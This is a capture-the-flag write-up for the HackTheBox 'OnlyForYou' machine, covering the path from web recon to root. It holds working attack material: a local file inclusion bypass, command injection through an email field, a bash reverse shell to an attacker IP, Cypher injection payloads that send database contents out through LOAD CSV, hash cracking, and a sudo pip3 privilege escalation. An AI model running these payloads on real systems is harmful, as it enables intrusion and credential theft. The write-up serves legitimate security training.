# HackTheBox - OnlyForYou
## NMAP
```bash
Nmap scan report for 10.10.11.210
Host is up (0.12s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e883e0a9fd43df38198aaa35438411ec (RSA)
| 256 83f235229b03860c16cfb3fa9f5acd08 (ECDSA)
|_ 256 445f7aa377690a77789b04e09f11db80 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://only4you.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
## PORT 80 (HTTP)
Visiting the webserver, it redirects to `only4you.htb`
After adding the domain name we can acces the site
The site is just a template, fuzzing for files using `gobuster` doesn't yield anything
Fuzzing for sub domains reveals that there's a `beta` domain
```bash
wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://only4you.htb' -H "Host: FUZZ.only4you.htb" --hh 178
```
From here we can download the source code
Looking at `app.py` we can spot LFI where it's checking if the file name starts with `..` or with `../`
This can be bypassed by starting the file name with `/` and reading any local files with in the context of www-data user
```bash
curl -X POST 'http://beta.only4you.htb/download' -d "image=/etc/passwd"
```
We can try reading default nginx config file
We can read the source code of only4you.htb site
It's using `sendmessage` function from `form.py`
```bash
curl -X POST 'http://beta.only4you.htb/download' -d "image=/var/www/only4you.htb/form.py"
```
From this function we can see that it's using subprocess to run `dig txt domain (from the email`, it's using regix to validate the email part
This can be bypassed by providing the input so that it gets validates the regix and inject the command with `;` so that it runs our injection command with `dig` i.e `dig txt uwu.com; curl 10.10.14.92`
So our email parameter should be like this
```bash
email=test@uwu.com;curl+10.10.14.92
```
Getting a shell by creating a sh script on our machine with a bash reverse shell payload, making the server download our script and executing it by piping it to bash
```bash
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.92/2222 0>&1
```
Checking the local ports with `ss -tulpn`, there's port 8001 running on which there's a login page
With chisel we can port forward this port
```bash
chisel client 10.10.14.92:3333 R:localhost:8001
chisel server -p 3333 --reverse
```
With default credentials, `admin:admin` we can login
## Privilege Escalation (john)
From the dashboard, we can see few tasks and out of these tasks there's one about migrating database to `neo4j` which is a graph database
Checking the `/employees` page we can search for an emplyoee
Since it's using neo4j as from those tasks, it uses cypher query which is a query to retrieve data from graph as neo4j is a graph database
```bash
' OR 1=1 WITH 1 as a CALL dbms.components() YIELD name, versions, edition UNWIND versions as version LOAD CSV FROM 'http://10.10.14.92/?version=' + version + '&name=' + name + '&edition=' + edition as l RETURN 0 as _0 //
```
To list the labels from neo4j database
```bash
' OR 1=1 WITH 1 as a CALL db.labels() YIELD label LOAD CSV FROM 'http://10.10.14.92/?'+label AS b RETURN b//
```
This query will give us 2 labels or tables in response which is `user` and `employee`
Now we need to extract the property or the value from user label
```bash
' OR 1=1 WITH 1 as a MATCH (f:user) UNWIND keys(f) as p LOAD CSV FROM 'http://10.10.14.92/?' + p +'='+toString(f[p]) as l RETURN 0 as _0 //
```
Cracking these two sha-256 hashes, we'll be able to use john's hash to switch to john user on the machine
```bash
john --wordlist=/usr/share/wordlists/rockyou.txt ./hash.txt --format=Raw-SHA256
```
From john, we can run `sudo -l` showing that pip3 can be executed as root user which will download any .tar.gz file from local port 3000 (this can be accessed through port forwarding the same way we did for port 8001, on this port there's an instance of gogs already running which like gitea or github
```bash
chisel client 10.10.14.92:3333 R:localhost:3000
```
From `Explore` we see two users, admin and john, we can use john's creds to login
Following this article for creating a pip package which will execute setup.py on download where you can execute commands as root user, here we can just make bash a SUID or get a reverse shell
https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/pip-download-code-execution/
After building the pip package, upload it to the `Test` repo
Go to the settings and make sure to make the repo public
Now run the command to download the pip package with sudo
```bash
sudo /usr/bin/pip3 download http://127.0.0.1:3000/john/Test/raw/master/exploitpy-0.0.1.tar.gz
```
## References
- https://book.hacktricks.xyz/pentesting-web/sql-injection/cypher-injection-neo4j
- https://pentester.land/blog/conf-notes-cypher-query-injection/
- https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/pip-download-code-execution/